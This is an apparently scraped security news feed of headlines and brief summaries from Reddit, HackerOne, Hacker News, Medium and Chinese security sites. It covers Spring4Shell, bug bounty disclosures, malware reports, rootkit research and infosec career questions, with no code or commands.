    I thought about a setup to maximize physical host usage by running Proxmox (hypervisor) on an internet-facing machine. The hypervisor OS would have 2 NICs: eth0 configured with an internal IPv4 address (for management purposes) and eth1 (the internet-facing adapter) with no IP (v4 or v6) configured on the hypervisor OS (present only to be attached to the router VM). eth1 will be attached only to the router VM (pfSense), which will also have another vNIC bridged to the internal network for obvious reasons. What issues/risks do you think this setup poses and how to secure this? This obviously will be only a home lab setup, not for a business etc. Thank you! submitted by /u/j0hnnyrico
    I think my neighbor is spamming my wifi router with deauth packets
    Title. I've been getting kicked off my WiFi at night, for 3 days straight; how can I confirm this so I can go to the police? I have an 802.xx device with aircrack-ng. submitted by /u/Far-Veterinarian9464
    Do I need an antivirus with iOS ?
    Most of the AVs don’t offer what they offer on Android, as iOS already has built-in security features that don’t let AVs function, essentially. submitted by /u/jigjagascrp4
    Which should I choose ? @gmail.com - @outlook.com - @icloud.com
    Not talking about apps, just domains (as I’m gonna use Apple Mail anyway): which one should I choose when creating an email address? submitted by /u/jigjagascrp4
  • Open

    [Security Advisory] Spring Framework remote command execution vulnerability (CVE-2022...
    Recently, a Spring official GitHub issue mentioned a remote command execution vulnerability in Spring Core, which is widespread in the Spring fram...
  • Open

    Information Leakage via TikTok Ads Web Cache Deception
    TikTok disclosed a bug submitted by arifmkhls: https://hackerone.com/reports/1484468 - Bounty: $200
    Stored XSS in merge request creation page through payload in approval rule name
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1342009 - Bounty: $3000
    IDOR: leak buyer info & Publish/Hide foreign comments
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1410498 - Bounty: $1250
    Stored XSS in Question edit from product name
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1416672 - Bounty: $500
    Stored XSS on AliExpress Review Importer/Products when deleting a product
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1425882 - Bounty: $500
    Stored XSS in Question edit for product name (bypass #1416672)
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1428207 - Bounty: $500
  • Open

    Gitlab – Static passwords set during OmniAuth-based registration (CVE-2022-1162)
    Article URL: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ Comments URL: https://news.ycombinator.com/item?id=30872415 Points: 8 # Comments: 0
    A Technical Analysis of How Spring4Shell (CVE-2022-22965) Works
    Article URL: https://www.extrahop.com/company/blog/2022/a-technical-analysis-of-how-spring4shell-works/ Comments URL: https://news.ycombinator.com/item?id=30870453 Points: 12 # Comments: 6
    Rust Open Source CVE Search Engine
    Article URL: https://github.com/Exein-io/kepler Comments URL: https://news.ycombinator.com/item?id=30866901 Points: 1 # Comments: 0
    Future-Proofing SaltStack (CVE-2022-22934, CVE-2022-22935, CVE-2022-22936)
    Article URL: https://blog.cloudflare.com/future-proofing-saltstack/ Comments URL: https://news.ycombinator.com/item?id=30866784 Points: 3 # Comments: 0
  • Open

    Cross-Site Scripting (XSS) via image rendering application
    Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be… Continue reading on Medium »
    80+ million Digilocker users’ phone numbers exposed [Fixed]
    This is a story about my last finding at Digilocker. In bug bounty we call this type of issue ‘low-hanging fruit’. I already contribute… Continue reading on Medium »
    Hats Protocol Economics — Part I
    Long-term sustainability and token utility Continue reading on Medium »
    CloudSek EWYL 2022 CTF
    Solving a Harry Potter Themed CTF Continue reading on InfoSec Write-ups »
  • Open

    Website OSINT
    Detecting malware packages in GitHub Actions
    CloudSek EWYL 2022 CTF
  • Open

    Spring Remote Code Execution Vulnerability
    Article URL: https://talktotheduck.dev/spring-remote-code-execution-vulnerability Comments URL: https://news.ycombinator.com/item?id=30871886 Points: 12 # Comments: 1
    Vulnerability in the Combined Charging System for Electric Vehicles
    Article URL: https://www.brokenwire.fail/ Comments URL: https://news.ycombinator.com/item?id=30867098 Points: 2 # Comments: 0
    New Spring4Shell Zero-Day Vulnerability: What it is and how to be prepared
    Article URL: https://www.contrastsecurity.com/security-influencers/new-spring4shell-vulnerability-confirmed-what-it-is-and-how-to-be-prepared Comments URL: https://news.ycombinator.com/item?id=30865001 Points: 2 # Comments: 0
  • Open

    Exploring a New Class of Kernel Exploit Primitive
    submitted by /u/soupcreamychicken
  • Open

    XSS Vulnerability Part 1
    Greetings, in this article I want to describe the XSS vulnerability in detail. Continue reading on Medium »
    REFLECTED XSS IN DEPED.GOV.PH BY NEUCHI
    Hello Infosec Community Continue reading on Medium »
  • Open

    Website OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information about several websites and… Continue reading on InfoSec Write-ups »
    How to clean a smartphone that fell into the wrong hands?
    Let’s talk about the safety of your smartphone in cases where it has fallen or is about to fall into the wrong hands. Firstly, the regular… Continue reading on Medium »
    Ukraine: Situation update as of April 1
    The last 24 hours Continue reading on Medium »
    TryHackMe: Content Discovery Writeup
    This room aims to teach the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities… Continue reading on Medium »
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
    9 reliable and free OSINT tools
    Maltego (https://www.maltego.com/) is one of the best data visualization and investigation automation systems in the world. Used even by… Continue reading on Medium »
    Identification of cryptocurrency wallets
    Let’s talk about the identification of cryptocurrency wallets. Continue reading on Medium »
    Deanonymization of a Skype profile
    Today I will tell you about the deanonymization of a Skype profile. It is appropriate to start researching a Skype profile by trying to… Continue reading on Medium »
  • Open

    SEC Filings for Nova Scotia Bank
    Hi all. Interesting one, may or may not have been posted before. Probably publicly available. https://www.sec.gov/Archives/edgar/data/9631/000114036122011592 submitted by /u/Stan464
  • Open

    Chrome 101: Federated Credential Management Origin Trial, Media Capabilities for WebRTC, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 101 is beta as of March 31, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Reduce User Agent String Information Chrome is trying to reduce the amount of information the user agent string exposes in HTTP requests as well as in navigator.userAgent, navigator.appVersion, and navigator.platform. We're doing this to prevent the user agent string from being used for passive user fingerprinting. To join the origin trial, see its entry on Chrome Origin Trials. See the end of this article for…
    What to Expect from Privacy Sandbox Testing
    We’re excited to share that Chrome is starting the next stage of testing for the Privacy Sandbox ads relevance and measurement proposals. Starting today, developers can begin testing globally the Topics, FLEDGE, and Attribution Reporting APIs in the Canary version of Chrome. We’ll progress to a limited number of Chrome Beta users as soon as possible. Once things are working smoothly in Beta, we’ll make API testing available in the stable version of Chrome to expand testing to more Chrome users. We recognize that developers will need some time to use the APIs, validate the data flows, and measure performance. We are looking forward to companies providing feedback as they move through the different testing phases, which will allow us to continually improve the APIs. Once we’re confident that…
  • Open

    SecWiki News 2022-03-31 Review
    A guide to CodeQL pitfalls: Java by ourren; CodeQL advanced: collecting routes by ourren. For more of the latest articles, visit SecWiki
  • Open

    Performance comparison of browser engines for Ajax Spidering 🏁
    ZAP's AjaxSpider is a feature that spiders by browsing directly through a headless browser. Firefox is configured by default, but depending on personal preference you can use various browsers (headless or regular) such as Chrome and PhantomJS. I suddenly got curious: which one is the fastest and finds the most? So I decided to compare them. TLDR firefox: Found 675 URLs chrome: Found 382 URLs phantomjs: Found 340 URLs How to test The method is simple. Run AjaxSpidering against Security Crawl Maze and compare the number of URLs collected.
    Cullinan
    Cullinan is a wiki for hacking/security/bugbounty Cullinan is a wiki and cheatsheet page for hacking/security/bugbounty. It covers definitions of common vulnerabilities, testing methods, bypass techniques, and countermeasures, as well as tools and tutorials. If you have a good idea or additional comments about the page, please send me (@hahwul) a tweet. Cullinan is a wiki and cheatsheet for hacking/security/bug bounty and AppSec in general. It covers definitions of common vulnerabilities, testing methods, bypass techniques and countermeasures, and also includes tool usage and tutorials.
  • Open

    HomeGrown Red Team: Let’s Evade AV And Run Lazagne
    What is Lazagne? Continue reading on Medium »
    SnapAttack Launches Community Edition to Drive Collaboration Across Cybersecurity Community
    Company launches free of charge platform providing access to a vast library of attack and detection content, including the latest threats… Continue reading on SnapAttack »
  • Open

    Collecting artefacts from a Windows/Linux system using an SSH remote connection
    I want to know how I can use SSH to connect remotely to a Windows or Linux system and access the artefacts (event logs, registry keys, files, timestamps) of the system and save them to the system I'm connecting from. submitted by /u/EzraSC [link] [comments]
  • Open

    Effective July 1: the Chongqing Municipal Data Regulations are officially released
    The Regulations consist of 8 chapters and 60 articles, covering general provisions, data processing and security, data resources, the data factor market, development and application, regional coordination, and legal liability.
    Master Directory Traversal Vulnerabilities from 0 to 1
    A directory traversal vulnerability arises from a configuration flaw in the website that lets its directories be browsed at will, which can expose many of the site's private files and directories.
    FreeBuf Enterprise Group Discussion | Enterprise Cybersecurity During the Pandemic
    How much protection does remotely using a company-issued computer loaded with the relevant security tools actually provide? How should enterprises build authentication mechanisms to ensure security?
    Master SQL Injection from 0 to 1
    Master SQL Injection from 0 to 1
    Brain-Computer Interface Technology Research Report
    A brain-computer interface is a direct connection created between the brain and an external device, enabling information exchange between the two. Its workflow covers acquisition of EEG signals, signal processing, signal output and execution, and finally feedback of the signal to the brain.
    CISA and DoE jointly warn of cyberattacks against Internet-connected UPS devices
    CISA and DoE have jointly released guidance on mitigating attacks against Internet-connected uninterruptible power supply (UPS) devices and issued a corresponding alert to enterprises.
    Lapsus$ extortion gang claims attack on IT giant Globant
    Recently, the extortion gang Lapsus$ claimed to have breached IT giant Globant and leaked roughly 70 GB of stolen data online.
    Surveillance software company FinFisher declares bankruptcy
    Munich-based spyware company FinFisher declared bankruptcy last month, and the authorities are investigating its business dealings.
    Personal data of 820,000 New York students exposed
    Recently, a widely used online grading and attendance system in New York was hacked, in what may be the largest exposure of student personal data in U.S. history. The criminals broke into Illuminate Education's IT systems in January and gained access to a database holding the personal data of roughly 820,000 current and former New York City public school students. Illuminate Education is a taxpayer-funded software company based in California. The company created the popular IO Classroom, Skedula and
    Some Honda models have a vulnerability that lets hackers remotely start the vehicle
    Hackers can unlock and start vehicles through a replay attack on the Honda vulnerability.
    Walk with the wise: FreeBuf Consulting's TTSP think tank opens public recruitment of experts
    Starting today, public recruitment for the TTSP security think tank is open; anyone in the cybersecurity community who wants to exchange ideas, learn together, and help advance the cybersecurity industry is welcome to sign up.
  • Open

    [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2)
    Author: Sangfor Qianlimu Security Lab. Related reading: 1. [Rootkit Research Series] Prologue: The Sword of Damocles Overhead 2. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Research Series] The State of Rootkit Detection Technology 5. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2) Preface...
    [Rootkit Research Series] The State of Rootkit Detection Technology
    Author: Sangfor Qianlimu Security Lab. Related reading: 1. [Rootkit Research Series] Prologue: The Sword of Damocles Overhead 2. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Research Series] The State of Rootkit Detection Technology 5. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2) Abstract...
    [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Linux Platform
    Author: Sangfor Qianlimu Security Lab. Related reading: 1. [Rootkit Research Series] Prologue: The Sword of Damocles Overhead 2. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Research Series] The State of Rootkit Detection Technology 5. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2) Preface...
    Malicious Word File Targeting Corporate Users
    Translator: Knownsec 404 Lab Translation Team. Original link: https://asec.ahnlab.com/en/33186/ The ASEC research team discovered a Word file that appears to target corporate users. The file contains an image prompting the user to enable macros, much like other malicious files. To trick the user into thinking it is harmless, when the macro runs it displays information related to improving Google account security. Ultimately, it downloads additional malware files and exfiltrates user information. When the file is run, it displays...
    [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform
    Author: Sangfor Qianlimu Security Lab. Related reading: 1. [Rootkit Research Series] Prologue: The Sword of Damocles Overhead 2. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Research Series] The State of Rootkit Detection Technology 5. [Rootkit Research Series] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2) 从西...
  • Open

    Effective Seed Scheduling for Fuzzing with Graph Centrality Analysis(S&P22)
    We use graph centrality scores to build a generic seed scheduler for LibFuzzer, AFL and concolic execution engine in QSYM. Check our paper at https://arxiv.org/abs/2203.12064. Our code and replication package are available at https://github.com/Dongdongshe/K-Scheduler. Comments URL: https://news.ycombinator.com/item?id=30863270 Points: 1 # Comments: 0
  • Open

    SpringShell: Spring Core RCE 0-day Vulnerability
    submitted by /u/Gorkha56 [link] [comments]

  • Open

    lunasec/2022-03-30-spring-core-rce
    submitted by /u/hackerboy69 [link] [comments]
    Spring Core on JDK9+ is vulnerable to remote code execution
    submitted by /u/ScottContini [link] [comments]
    Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities
    submitted by /u/freeqaz [link] [comments]
    Betabot in the Rearview Mirror
    submitted by /u/krabsonsecurity [link] [comments]
    Top 3 Stealer Malware Activity Research
    submitted by /u/mstfknn [link] [comments]
    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler [link] [comments]
    Threat Alert: First Python Ransomware Attack Targeting Jupyter Notebooks
    submitted by /u/esdaniel- [link] [comments]
    A few vulnerabilities discovered in Wyze Cam (CVE-2019-9564, CVE-2019-12266)
    submitted by /u/jaymzu [link] [comments]
    Decrypting your own HTTPS traffic with Wireshark
    submitted by /u/Quantum_Rage [link] [comments]
    Cisco Nexus Dashboard Fabric Controller unauth web-to-root shell
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
    submitted by /u/Gallus [link] [comments]
    Spring Cloud Function SPEL Expression Injection Vulnerability Alert
    submitted by /u/Gallus [link] [comments]
  • Open

    EDRs & Shellcode Loaders
    In this post I have covered the basics of how EDR products work and also some ways to get around them (some source code included). Continue reading on Medium »
    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
  • Open

    New Wave of AnonymousFox Cron Jobs
    Recently our Remediation and Research teams have noticed a new wave of malicious cron jobs associated with the notorious AnonymousFox malware. The cron jobs are purpose-built to reinfect the victim websites and make removal of the infection more cumbersome and time-consuming. In this post we’ll investigate one of these malicious cron jobs, describe what it does and how you can recognise and remove them on your website. If you’re currently dealing with such a hack you can check out our extensive AnonymousFox Hack Guide here for help with removing the infection from your environment. Continue reading New Wave of AnonymousFox Cron Jobs at Sucuri Blog.
  • Open

    Try hack me: Sakura Room
    OSINT challenge Continue reading on Medium »
    Ukraine: Situation update as of March 31
    The last 24 hours Continue reading on Medium »
    War in Ukraine / March 29
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to… Continue reading on Medium »
  • Open

    ihsinme: CPP Add a query to find incorrectly used exceptions.
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1455531 - Bounty: $1000
    [Python]: Add shutil module sinks for path injection query
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1471622 - Bounty: $1000
    Java: An experimental query for ignored hostname verification
    GitHub Security Lab disclosed a bug submitted by artem: https://hackerone.com/reports/1481247 - Bounty: $1800
    [Java]: CWE-073 - File path injection with the JFinal framework
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1483918 - Bounty: $1800
    CPP: Add query for CWE-266 Incorrect Privilege Assignment
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1483919 - Bounty: $1800
    [C#] CWE-759: Query to detect password hash without a salt
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1484086 - Bounty: $1800
    Java : Add query to detect Server Side Template Injection (SSTI)
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1490372 - Bounty: $1800
    Python: CWE-338 insecureRandomness
    GitHub Security Lab disclosed a bug submitted by museljh: https://hackerone.com/reports/1490400 - Bounty: $1800
    [Java]: Timing attacks while comparing the headers value
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1496268 - Bounty: $1000
    [Java]: Add JDBC connection SSRF sinks
    GitHub Security Lab disclosed a bug submitted by p0wn4j: https://hackerone.com/reports/1512936 - Bounty: $1800
    [Python]: CWE-611: XXE
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1512937 - Bounty: $1800
    CPP: Add query for CWE-377 Insecure Temporary File
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1515139 - Bounty: $1000
    [Java]: CWE-200 - Query to detect insecure WebResourceResponse implementation
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1526609 - Bounty: $1800
    Upload Profile Photo in any folder you want with any extension you want
    Stripo Inc disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/753375
    Insecure Storage and Overly Permissive API Keys
    Stripo Inc disclosed a bug submitted by andformod: https://hackerone.com/reports/1283575
    Ability to use premium templates as free user via https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral
    Stripo Inc disclosed a bug submitted by 0xkira: https://hackerone.com/reports/1166993
  • Open

    Tool for Chromebook forensic acquisition
    Does anyone know of a tool that I can use for Chromebook forensic acquisition (K-12 environment)? The company Magnet Forensics had such a tool, but they no longer support it. submitted by /u/1682aggie [link] [comments]
    cyber triage vs magnet axiom cyber
    I get Axiom's analysis might be a little better/different. But in terms of remote triage what's the difference? Is one cheaper? submitted by /u/CrazyKitty2016 [link] [comments]
    The Truth About USB Device Serial Numbers
    submitted by /u/shelbpresc [link] [comments]
  • Open

    What are some RPOs for popular compliance standards?
    Also, how does your company determine its Recovery Point Objectives? submitted by /u/CitizenJosh [link] [comments]
    How to validate DOM XSS via scripts
    Hey everyone. I've been around for a while but have avoided certain topics like the plague. DOM XSS is one of those, but today I watched a video on it that recommended reviewing the page's code and going through that method to discover DOM XSS. Now to be clear, what brought this on was a finding in Burp: it's flagging on a JS file, and from there location.hash data is being passed to an element/value. What I could use some help with is understanding this type of DOM XSS and how to validate this. I'm tired of not understanding this. My thought is that this JS file has a vulnerable function and I should be looking for this function in use in the application somewhere. Oh, also I'm not the most intelligent person and have no real experience with JavaScript, so it may be necessary to dumb some things down. And if there's a video that talks about this I would appreciate it. All the ones I've seen just show document.write directly in the web page, not in a script. submitted by /u/realKevinNash [link] [comments]
    How to document access request workflows?
    A common problem is that people new to an organization don't know how to get access to certain systems. Are there known best practices for helping people orient themselves as to what access they need to request to achieve a certain task? E.g. I want to access system ABC, therefore I need role "ABC user" and should raise this request with "ABC admins" who can be found here: xyz@example.com submitted by /u/soroyaya [link] [comments]
    Mandatory Access Control Frameworks
    Hi, I want to improve on my rather rudimentary knowledge of MAC frameworks (SELinux, AppArmor). Can you point me to learning material/courses that you have had good experience with? submitted by /u/turingtest1 [link] [comments]
    I am using Burp Suite to intercept traffic from a site. I am trying to view the images from the proxy, but the site uses WebSockets to send all the images as Data URIs (Base64) at once, to be loaded on demand (which is called "lazy loading"). Alternatively, how do I get Driftnet to work on Data URIs?
    Can lazy loading be considered some sort of protection against tools that sniff images over the network, like Driftnet? Image of the Burp session and the data. Thanks a lot. submitted by /u/theycallmemonlight [link] [comments]
  • Open

    Possible New Java Spring Framework Vulnerability (Updated: Not a Spring Problem)
    Article URL: https://isc.sans.edu/diary/Possible+new+Java+Spring+Framework+Vulnerability+%28Updated%3A+not+a+Spring+problem%29/28498 Comments URL: https://news.ycombinator.com/item?id=30858065 Points: 2 # Comments: 0
  • Open

    Going Through FBI's "Oversight of the FBI Cyber Division" Testimony
    The FBI has recently released its "Oversight of the FBI Cyber Division" in the form of a testimony which offers quite an important peek inside the FBI's understanding of current and emerging cyber threats, including an understanding of its situational awareness in the world of cybercrime and cyber-related fraud and threats. An excerpt: "The most significant nation-state threats we face are those
    The FCC Adds Kaspersky to Its List of National Security Threats
    The FCC has recently added Kaspersky products to its list of National Security Threats while the company publicly issued a statement claiming that the decision was made on political grounds. The company also cited yet another decision by the U.S. DHS back in 2017 which basically forbids U.S.-based companies from doing business with the company. In the past I've discussed how central antivirus
    Courtesy of Republic of Bulgaria! - Part Five
    In the deepest and ugliest and most disgusting corners of the universal irrelevance of the universe known as dipshit land savage land peasant land there's a universal dipshit known as? Guess what? I won't tell you and best of all you don't have to guess for yourself. Don't bother. Related posts: Courtesy of Republic of Bulgaria! - Part Four; Courtesy of Republic of Bulgaria! - Part Three; Courtesy of
  • Open

    SecWiki News 2022-03-30 Review
    No news updates today~ For more of the latest articles, visit SecWiki.
  • Open

    Shellcode as User Input | Off Topic if I may
    submitted by /u/C0DEV3IL [link] [comments]
    Whitepaper – Double Fetch Vulnerabilities in C and C++
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    My Pentest Log -12- (Out-Of-Band Sql Injection in MySQL)
    Greetings to everyone from Byzantion, Continue reading on Medium »
    Universe Finance x Immunefi: Bug Bounty Program
    Dear spacemen, Continue reading on Medium »
    How I was able collect PII of all users
    Hello Folks 👋, Continue reading on Medium »
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Notion as a platform for offensive operations
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Simplifying Your Operational Threat Hunt Planning
    Opening Hopefully you all were able to read our recent Threat Hunting whitepaper and had the chance to listen to our latest Threat Hunting webinar. These references should be used as the foundation of information, which leads us into the next journey: how to build out your first Threat Hunt. Building out an organization’s Threat... The post Simplifying Your Operational Threat Hunt Planning appeared first on TrustedSec.
  • Open

    One Chart to Understand the Latest Global DDoS Attack Trends
    One chart to understand the latest global DDoS attack trends.
    The "Transparent Tribe" APT group is aggressively attacking Indian officials
    The Pakistan state-backed APT group known as Transparent Tribe is mounting a large-scale cyberattack campaign using the CrimsonRAT remote access trojan, targeting Indian officials.
    FreeBuf Morning Report | Transparent Tribe attacks Indian officials; Washington health district suffers another data breach
    A health district in Washington State has issued its second data breach notice of 2022.
    Shutterfly data leaked after Conti ransomware attack
    Recently, online retail and photography platform Shutterfly had employee information leaked after a Conti ransomware attack. The company provides photography services to consumers, businesses, and brands including Shutterfly.com, BorrowLenses, GrooveBook, Snapfish, and Lifetouch. Shutterfly recently disclosed that its network was breached on December 3, 2021 in a ransomware attack. During the ransomware attack, the threat actors gained access to
    Some WordPress sites injected with scripts to launch DDoS attacks against Ukraine
    The targeted sites mainly include Ukrainian government agencies, the recruitment site of the International Legion of Ukraine, financial sites, and other pro-Ukraine sites.
    The largest crypto hack in history: $625 million stolen from the Axie Infinity sidechain Ronin bridge
    Recently, attackers stole nearly $625 million worth of Ethereum and USDC from Axie Infinity's sidechain Ronin cross-chain bridge.
    Hackers send nearly 4,000 fake job-offer emails a day promising easy money
    Proofpoint has published a report stating that a hacking group is using email to spread fake job offers, not only stealing users' personal data but also luring victims into money laundering.
    Vulnerability Intelligence | Early Warning: Spring Framework Remote Command Execution Vulnerability
    On March 29, a 0-day RCE vulnerability was disclosed in the Spring Framework. Deployments using JDK 9 and later may be affected.
  • Open

    [Rootkit Research Series] Prologue: The Sword of Damocles Overhead
    Author: Sangfor Qianlimu Lab. Preface: APT, short for Advanced Persistent Threat, typically has a regional or political background and aims at intelligence gathering, sabotage, or economic gain. Its attack chain may involve various forms of social engineering, initial access, internal network penetration, and 0-day exploitation. As an asymmetric means of attack, it can often bring the political or economic entity behind the attacking group unexpected geopolitical, intelligence, economic, or even military benefits or tactical advantages. The detection, attribution, and countering of APT attacks often represent...
  • Open

    Windows freaking XP
    I may need to expose a Windows XP machine to the internet, although I am fighting it, a battle maybe lost. Our corp AV doesn't support XP nor will it get patched. Any suggestions on protecting it? Would a proxy server give me enough protection, specifically an NGFW acting in proxy mode with the XP machine ring-fenced to hell? It doesn't directly expose the machine to the web, but I'm not sure it will give the protection I am hoping for. The NGFW will also do IPS, deep inspection etc... Edit: thanks for the follow up all, an interesting read in the replies and some good feedback on options. I talked the management out of giving it internet access. This is an OT network with little option of changing OS as the tools/apps support only XP. OT networking is woeful at times and very real for those saying stop using XP. For those interested: isolated PVLAN behind my FW with only one "DMZ" jumpbox given inbound access to allow remote app support, with MFA and identity-based rules for access to the jumpbox, copy/paste and file transfer disabled as much as I can between the two, and only a strict select and trusted few have access to the JB. Data transfers are controlled via a manual process with a scrubbed USB stick using a buffer device to scan before transferring data. submitted by /u/watty_123 [link] [comments]
    Questions about using public wifi
    Let's say I am at an apartment, on the plane, etc. where I am using public wifi with a VPN: Is it safe to use WhatsApp, Facebook etc.? I'm just thinking, when I use the WhatsApp or Facebook app, I don't really enter any info/PIN/password at all, so it should be safe, right? What about banking apps that require you to enter a PIN number? Is it safe to do this while on public wifi? Will the VPN help against this? Even if I visit websites, if those websites use HTTPS, shouldn't I be safe? submitted by /u/AliveandDrive [link] [comments]
    eJPT Cert exam
    I have been thinking of taking the eJPT cert but I want to properly learn, so does anyone know of some resources to prepare for the test or tips as well? submitted by /u/Mokushi99 [link] [comments]
    How to study SANS labs?
    Currently indexing and working through the SEC504 / GCIH labs. Aside from working through each lab multiple times, does anyone have methods to drill the labs into your brain? Not sure if indexing the 450p workbook is worth the time. Thanks in advance! submitted by /u/Vassar_Bashing [link] [comments]
    How can I make a switch from DevOps to security oriented roles?
    Hi, I started out as a developer, then I got into cloud and automation, and I loved it very much. Cloud infrastructure automation felt like playing with Lego bricks - fitting all the right cloud services together and making someone else's job easier. I have 5 years of total experience in IT. But recently I moved into a DevOps role (if I could even call it that) - and I was told that I would be working on Terraform scripts, migrating apps from on-premises, but a few months into the job, I found that it is anything but that. I feel like I don't really have a core skill anymore, no identity, and feel like an imposter. My dream since the beginning was to get into security and I thought getting my hands dirty in DevOps and infrastructure related roles would help me get there, but now I do miscella…
    Higher Studies for Cyber Security
    Hi guys. A quick thing. I am changing my career path to cybersecurity because I always wanted to be in that but never got the chance to do so because of financial issues. But now I have all the stuff that I need to pursue my dream. I am 27 years old and I know I am not that late to start from scratch. So for my studies, I thought of starting from a Network Engineering Diploma, HND in Network Engineering, and then a BSc in Ethical Hacking and Network Security. Do you guys think this is the right path to go for or is there another path I should follow? My main target is to be on the Defense (Blue Team) side of CS. But I want to learn pentesting as well, which I thought to myself I could do alone, getting help from professionals in the field. But my worry is about my studies. Please help. :) submitted by /u/PapadumSriLanka [link] [comments]
    Encrypted android->jabber (laptop) messaging?
    Basically I have a friend who isn't technically proficient, and I want him to communicate securely with me. He's too retarded to learn how to use encryption etc. After a quick setup with him, physically next to me, on his phone, what can I install on Tails to communicate? Is there a standalone Android app that will connect to Tails with him? Also what stops Google's keyboard from storing keystrokes? submitted by /u/sohna2 [link] [comments]
    ACSC (Aus) 'Essential Eight' benchmark scanner: Do these exist for on-device scanning (like OpenSCAP can for Stig)?
    I'd love to use a tool that can mark against Essential Eight controls at different maturity levels. Everyone seems to just self-assess manually, but many can be queried with PowerShell modules, WMI etc. Google results are very limited for Aus-relevant security scanners. submitted by /u/L3T [link] [comments]
    Just got a life changing salary by switching job
    I cannot hold my happiness anymore and I have nobody in my entourage that I can talk to about money and career, but I just got a new high paying job! If you check my post history, I was a bit concerned about my salary of 60k in Montreal. Now I accepted an offer of 93k (TC of 105k) for a Security Analyst role in the financial industry and to be honest, it's a life changing salary for me. I never imagined having this kind of salary after 2 years out of college. Still living at my parents' place and never got a high salary like this. I know this is not r/personalfinance but what is the best advice you can give to a young professional like me? Thanks! submitted by /u/gateau_a_la_creme [link] [comments]
    First day of internship tomorrow
    Hello, So recently I graduated from MIS and I was taking some time off, doing CTFs on HTB, learning basic networks (protocols, routing, VPNs, etc.) till we recently discovered a neighbour who works in IT. I talked with him about an internship for me and he agreed after seeing my CV. His company works in cloud and IT solutions. I told him that I am more interested in the security part and he told me he can give me access to courses about FortiGate, Palo Alto, and he will let me interact with customers more. Their jobs have to do with networks a lot and I felt there is room for learning network security. At least I can change my status on LinkedIn to Network Security Intern. But they also heavily work in cloud and Azure. I am really nervous. I feel like I am going to fuck shit up tomorrow and end up being a clown. I also don't want to feel self-conscious because I didn't get it 100% from my skills but there is a connection. I am scared this internship will have nothing to do with security but I need an internship to fill my resume. I guess tomorrow we will find out. I feel like I am going to end up smoking before meeting them and blow the whole thing up and go back to testing websites using Burp for SSRF and XSS (without any luck). submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Swappi public testnet and bug bounties
    Try Swappi and earn rewards. Up to 100,000 $PPI in rewards! Continue reading on Conflux en español »
    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on CodeX »
    nothing
    Continue reading on Medium »
    How I bypassed 403 forbidden domain using a simple trick
    Hello hunters, Continue reading on Medium »
    How I Accidentally Prevented A Mass Hacking
